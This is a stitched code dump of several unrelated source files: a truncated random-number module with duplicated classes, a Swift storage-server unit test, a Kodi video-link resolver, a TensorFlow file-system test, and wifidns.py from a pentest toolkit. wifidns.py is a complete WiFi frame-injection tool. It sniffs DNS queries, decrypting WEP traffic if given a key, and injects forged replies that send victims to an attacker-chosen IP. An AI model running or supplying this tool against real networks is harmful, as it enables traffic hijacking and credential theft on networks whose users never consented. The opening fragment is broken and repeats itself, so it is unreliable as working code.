class SHA256Random(hashexpand.SHA256Expander, random.Random):
def __init__(self, seed=None, deterministic=True):
warnings.warn("deprecated", DeprecationWarning)
if not deterministic:
raise NotImplementedError, "SHA256Expander is always deterministic. For non-deterministic, try urandomRandom."
hashexpand.SHA256Expander.__init__(self)
random.Random.__init__(self, seed)
self.seed(seed)
def seed(self, seed=None):
if seed is None:
import increasing_timer
seed = repr(increasing_timer.time())
hashexpand.SHA256Expander.seed(self, seed)
class SHA256Random(hashexpand.SHA256Expander, random.Random):
def __init__(self, seed=""):
warnings.warn("deprecated", DeprecationWarning)
hashexpand.SHA256Expander.__init__(self)
self.seed(seed)
def seed(self, seed=None):
if seed is None:
seed = os.urandom(32)
hashexpand.SHA256Expander.seed(self, seed)
except ImportError, le:
class InsecureSHA256Random:
def __init__(self, seed=None):
raise ImportError, le
class SHA256Random:
def __init__(self, seed=""):
raise ImportError, le
class devrandomRandom(random.Random):
""" The problem with using this one, of course, is that it blocks. This
is, of course, a security flaw. (On Linux and probably on other
systems.) --Zooko 2005-03-04
Not repeatable.
"""
def __init__(self):
warnings.warn("deprecated", DeprecationWarning)
self.dr = open("/dev/random", "r")
def get(self, bytes):
return self.dr.read(bytes)
class devurandomRandom(random.Random):
""" The problem with using this one is that it gives answers even when it
has never been properly seeded, e.g. when you are booting from CD and have
just started up and haven't yet gathered enough entropy to actually be
unguessable. (On Linux and probably on other systems.) --Zooko 2005-03-04
Not repeatable.
"""
def get(self, bytes):
warnings.warn("deprecated", DeprecationWarning)
return os.urandom(bytes)
randobj = devurandomRandom()
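# Module-level convenience aliases bound to the urandom-backed generator above.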
get = randobj.get
random = randobj.random
randrange = randobj.randrange
shuffle = randobj.shuffle
choice = randobj.choice
seed = randobj.seed
def randstr(n):
return ''.join(map(chr, map(randrange, [0]*n, [256]*n)))
def insecurerandstr(n):
return os.urandom(n)
|
gugahoi/maraschino | refs/heads/master | lib/flask/testsuite/test_apps/flask_broken/__init__.py | 629 | import flask.ext.broken.b
import missing_module
|
harayz/raspberry_pwn | refs/heads/master | src/pentest/wifitap/wifidns.py | 9 | #! /usr/bin/env python
########################################
#
# wifidns.py --- WiFi injection DNS answering tool based on Wifitap
#
# Copyright (C) 2005 Cedric Blancher <[email protected]>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation; version 2.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
#########################################
import os,sys,getopt,struct,re,string,logging
# Import Psyco if available to speed up execution
try:
import psyco
psyco.full()
except ImportError:
print "Psyco optimizer not installed, running anyway..."
pass
from socket import *
from fcntl import ioctl
from select import select
logging.getLogger("scapy").setLevel(1)
from scapy import Raw,Ether,PrismHeader,Dot11,Dot11WEP,LLC,SNAP,sendp,conf
# We want to build a DNS Query answering machine
from scapy import IP,UDP,DNS,DNSRR
IN_IFACE = "ath0"
OUT_IFACE = "ath0"
HAS_SMAC = 0
SMAC = ""
WEP = 0
KEYID = 0
DEBUG = 0
VERB = 0
TTL = 64
BSSID = ""
IPDNS = ""
WEPKEY = ""
def usage(status=0):
print "Usage: wifidns -b <BSSID> -a <IP> [-o <iface>] [-i <iface>]"
print " [-s <SMAC>] [-t <TTL>] [-w <WEP key>]"
print " [-k <key id>]] [-d [-v]] [-h]"
print " -b <BSSID> specify BSSID for injection"
print " -a <IP> specify IP address for DNS answers"
print " -t <TTL> Set TTL (default: 64)"
print " -o <iface> specify interface for injection (default: ath0)"
print " -i <iface> specify interface for listening (default: ath0)"
print " -s <SMAC> specify source MAC address for injected frames"
print " -w <key> WEP mode and key"
print " -k <key id> WEP key id (default: 0)"
print " -d activate debug"
print " -v verbose debugging"
print " -h this so helpful output"
sys.exit(status)
opts = getopt.getopt(sys.argv[1:],"b:a:o:i:s:t:w:k:dvh")
for opt,optarg in opts[0]:
if opt == "-b":
BSSID = optarg
elif opt == "-a":
IPDNS = optarg
elif opt == "-o":
OUT_IFACE = optarg
elif opt == "-i":
IN_IFACE = optarg
elif opt == "-s":
HAS_SMAC += 1
SMAC = optarg
elif opt == "-w":
WEP += 1
WEPKEY = optarg
elif opt == "-k":
KEYID = int(optarg)
elif opt == "-t":
TTL = int(optarg)
elif opt == "-d":
DEBUG += 1
elif opt == "-v":
VERB += 1
elif opt == "-h":
usage()
if not BSSID:
print "\nError: BSSID not defined\n"
usage()
if not IPDNS:
print "\nError: IP not defined\n"
usage()
# Match and parse BSSID
if re.match('^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$', BSSID):
BSSID = BSSID.lower()
else:
print "\nError: Wrong format for BSSID\n"
usage()
if HAS_SMAC:
if not SMAC:
print "\nError: SMAC not defined\n"
usage()
# Match and parse SMAC
elif re.match('^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$', SMAC):
SMAC = SMAC.lower()
else:
print "\nError: Wrong format for SMAC\n"
usage()
# Match and parse IP
if not re.match('^(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])$', IPDNS):
print "\nError: Wrong IP address\n"
usage()
print "IN_IFACE: %s" % IN_IFACE
print "OUT_IFACE: %s" % OUT_IFACE
print "BSSID: %s" % BSSID
if HAS_SMAC:
print "SMAC: %s" % SMAC
print "IP: %s" % IPDNS
if WEP:
# Match and parse WEP key
tmp_key = ""
if re.match('^([0-9a-fA-F]{2}){5}$', WEPKEY) or re.match ('^([0-9a-fA-F]{2}){13}$', WEPKEY):
tmp_key = WEPKEY
elif re.match('^([0-9a-fA-F]{2}[:]){4}[0-9a-fA-F]{2}$', WEPKEY) or re.match('^([0-9a-fA-F]{2}[:]){12}[0-9a-fA-F]{2}$', WEPKEY):
tmp_key = re.sub(':', '', WEPKEY)
elif re.match ('^([0-9a-fA-F]{4}[-]){2}[0-9a-fA-F]{2}$', WEPKEY) or re.match ('^([0-9a-fA-F]{4}[-]){6}[0-9a-fA-F]{2}$', WEPKEY):
tmp_key = re.sub('-', '', WEPKEY)
else:
print "\nError : Wrong format for WEP key\n"
usage()
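    # Expand the hex key string into raw key bytes: each pair of hex digits becomes one chr.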
g = lambda x: chr(int(tmp_key[::2][x],16)*16+int(tmp_key[1::2][x],16))
for i in range(len(tmp_key)/2):
conf.wepkey += g(i)
print "WEP key: %s (%dbits)" % (WEPKEY, len(tmp_key)*4)
if KEYID > 3 or KEYID < 0:
print "Key id: %s (defaulted to 0 due to wrong -k argument)" % KEYID
KEYID = 0
else:
print "Key id: %s" % KEYID
else:
if KEYID != 0:
print "WEP not activated, key id ignored"
print "TTL: %s" % TTL
if not DEBUG:
if VERB:
print "DEBUG not activated, verbosity ignored"
else:
print "DEBUG activated"
if VERB:
print "Verbose debugging"
conf.iface = OUT_IFACE
# Here we put a BPF filter so only 802.11 Data/to-DS frames are captured
s = conf.L2listen(iface = IN_IFACE,
filter = "link[0]&0xc == 8 and link[1]&0xf == 1")
# Speed optimization so Scapy does not have to parse payloads
DNS.payload_guess = []
try:
while 1:
dot11_frame = s.recv(2346)
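        # Read up to 2346 bytes, the maximum 802.11 frame size.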
        # WEP handling is automagically done by Scapy if conf.wepkey is set
# Nothing to do to decrypt
# WEP frames have Dot11WEP layer, others don't
if DEBUG and VERB:
if dot11_frame.haslayer(Dot11WEP): # WEP frame
os.write(1,"Received WEP from %s\n" % IN_IFACE)
else: # Cleartext frame
os.write(1,"Received from %s\n" % IN_IFACE)
os.write(1,"%s\n" % dot11_frame.summary())
if dot11_frame.getlayer(Dot11).addr1 != BSSID:
continue
# Identifying DNS Queries
if dot11_frame.haslayer(DNS) and dot11_frame.getlayer(DNS).qr == 0:
if DEBUG:
os.write(1,"Received DNS Query on %s\n" % IN_IFACE)
if VERB:
os.write(1,"%s\n" % dot11_frame.summary())
# Building DNS Reply answer for injection
dot11_answer = Dot11(
type = "Data",
FCfield = "from-DS",
addr1 = dot11_frame.getlayer(Dot11).addr2,
addr2 = BSSID)
if not HAS_SMAC:
dot11_answer.addr3 = dot11_frame.getlayer(Dot11).addr1
else:
dot11_answer.addr3 = SMAC
if WEP:
dot11_answer.FCfield |= 0x40
dot11_answer /= Dot11WEP(
iv = "111",
keyid = KEYID)
dot11_answer /= LLC(ctrl = 3)/SNAP()/IP(
src = dot11_frame.getlayer(IP).dst,
dst = dot11_frame.getlayer(IP).src,
ttl = TTL)
dot11_answer /= UDP(
sport = dot11_frame.getlayer(UDP).dport,
dport = dot11_frame.getlayer(UDP).sport)
dot11_answer /= DNS(
id = dot11_frame.getlayer(DNS).id,
qr = 1,
qd = dot11_frame.getlayer(DNS).qd,
an = DNSRR(
rrname = dot11_frame.getlayer(DNS).qd.qname,
ttl = 10,
rdata = IPDNS)
)
if DEBUG:
os.write(1,"Sending DNS Reply on %s\n" % OUT_IFACE)
if VERB:
os.write(1,"%s\n" % dot11_frame.summary())
# Frame injection :
sendp(dot11_answer,verbose=0) # Send frame
# Program killed
except KeyboardInterrupt:
print "Stopped by user."
s.close()
sys.exit()
|
anishnarang/gswift | refs/heads/master | test/unit/common/test_base_storage_server.py | 26 | # Copyright (c) 2010-2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import os
from swift.common.base_storage_server import BaseStorageServer
from tempfile import mkdtemp
from swift import __version__ as swift_version
from swift.common.swob import Request
from swift.common.utils import get_logger, public
from shutil import rmtree
class FakeOPTIONS(BaseStorageServer):
server_type = 'test-server'
def __init__(self, conf, logger=None):
super(FakeOPTIONS, self).__init__(conf)
self.logger = logger or get_logger(conf, log_route='test-server')
class FakeANOTHER(FakeOPTIONS):
@public
def ANOTHER(self):
"""this is to test adding to allowed_methods"""
pass
class TestBaseStorageServer(unittest.TestCase):
"""Test swift.common.base_storage_server"""
def setUp(self):
self.tmpdir = mkdtemp()
self.testdir = os.path.join(self.tmpdir,
'tmp_test_base_storage_server')
def tearDown(self):
"""Tear down for testing swift.common.base_storage_server"""
rmtree(self.tmpdir)
def test_server_type(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
baseserver = BaseStorageServer(conf)
msg = 'Storage nodes have not implemented the Server type.'
try:
baseserver.server_type
except NotImplementedError as e:
self.assertEquals(str(e), msg)
def test_allowed_methods(self):
conf = {'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'}
# test what's available in the base class
allowed_methods_test = FakeOPTIONS(conf).allowed_methods
self.assertEquals(allowed_methods_test, ['OPTIONS'])
# test that a subclass can add allowed methods
allowed_methods_test = FakeANOTHER(conf).allowed_methods
allowed_methods_test.sort()
self.assertEquals(allowed_methods_test, ['ANOTHER', 'OPTIONS'])
conf = {'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'true'}
# test what's available in the base class
allowed_methods_test = FakeOPTIONS(conf).allowed_methods
self.assertEquals(allowed_methods_test, [])
# test that a subclass can add allowed methods
allowed_methods_test = FakeANOTHER(conf).allowed_methods
self.assertEquals(allowed_methods_test, [])
conf = {'devices': self.testdir, 'mount_check': 'false'}
# test what's available in the base class
allowed_methods_test = FakeOPTIONS(conf).allowed_methods
self.assertEquals(allowed_methods_test, ['OPTIONS'])
# test that a subclass can add allowed methods
allowed_methods_test = FakeANOTHER(conf).allowed_methods
allowed_methods_test.sort()
self.assertEquals(allowed_methods_test, ['ANOTHER', 'OPTIONS'])
def test_OPTIONS_error(self):
msg = 'Storage nodes have not implemented the Server type.'
conf = {'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'}
baseserver = BaseStorageServer(conf)
req = Request.blank('/sda1/p/a/c/o', {'REQUEST_METHOD': 'OPTIONS'})
req.content_length = 0
try:
baseserver.OPTIONS(req)
except NotImplementedError as e:
self.assertEquals(str(e), msg)
def test_OPTIONS(self):
conf = {'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'}
req = Request.blank('/sda1/p/a/c/o', {'REQUEST_METHOD': 'OPTIONS'})
req.content_length = 0
resp = FakeOPTIONS(conf).OPTIONS(req)
self.assertEquals(resp.headers['Allow'], 'OPTIONS')
self.assertEquals(resp.headers['Server'],
'test-server/' + swift_version)
|
teamtuga4/teamtuga4ever.repository | refs/heads/master | script.module.urlresolver/lib/urlresolver/plugins/vidzi.py | 4 | '''
vidzi urlresolver plugin
Copyright (C) 2014 Eldorado
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
import urllib
from lib import jsunpack
from urlresolver import common
from urlresolver.resolver import UrlResolver, ResolverError
class VidziResolver(UrlResolver):
name = "vidzi"
domains = ["vidzi.tv"]
pattern = '(?://|\.)(vidzi\.tv)/(?:embed-)?([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
html = self.net.http_GET(web_url).content
if '404 Not Found' in html:
raise ResolverError('File Not Found or removed')
r = re.search('file\s*:\s*"([^"]+)', html)
if r:
return r.group(1) + '|' + urllib.urlencode({'Referer': 'http://vidzi.tv/nplayer/jwplayer.flash.swf'})
else:
for match in re.finditer('(eval\(function.*?)</script>', html, re.DOTALL):
js_data = jsunpack.unpack(match.group(1))
r = re.search('file\s*:\s*"([^"]+)', js_data)
if r:
return r.group(1)
raise ResolverError('Unable to locate link')
def get_url(self, host, media_id):
return 'http://%s/embed-%s.html' % (host, media_id)
def get_host_and_id(self, url):
r = re.search(self.pattern, url)
if r:
return r.groups()
else:
return False
def valid_url(self, url, host):
return re.search(self.pattern, url) or self.name in host
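
# Hedged usage sketch (assumption: this mirrors how other urlresolver plugins
# are driven; the URL and media id below are made up for illustration):
#
#     resolver = VidziResolver()
#     url = 'http://vidzi.tv/embed-abc123xyz.html'
#     host, media_id = resolver.get_host_and_id(url)
#     if resolver.valid_url(url, host):
#         stream_url = resolver.get_media_url(host, media_id)  # performs HTTP GET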
|
sandeepgupta2k4/tensorflow | refs/heads/master | tensorflow/python/framework/file_system_test.py | 36 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import load_library
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class FileSystemTest(test.TestCase):
def setUp(self):
file_system_library = os.path.join(resource_loader.get_data_files_path(),
"test_file_system.so")
load_library.load_file_system_library(file_system_library)
def testBasic(self):
with self.test_session() as sess:
reader = io_ops.WholeFileReader("test_reader")
queue = data_flow_ops.FIFOQueue(99, [dtypes.string], shapes=())
queue.enqueue_many([["test://foo"]]).run()
queue.close().run()
key, value = sess.run(reader.read(queue))
self.assertEqual(key, compat.as_bytes("test://foo"))
self.assertEqual(value, compat.as_bytes("AAAAAAAAAA"))
if __name__ == "__main__":
test.main()
|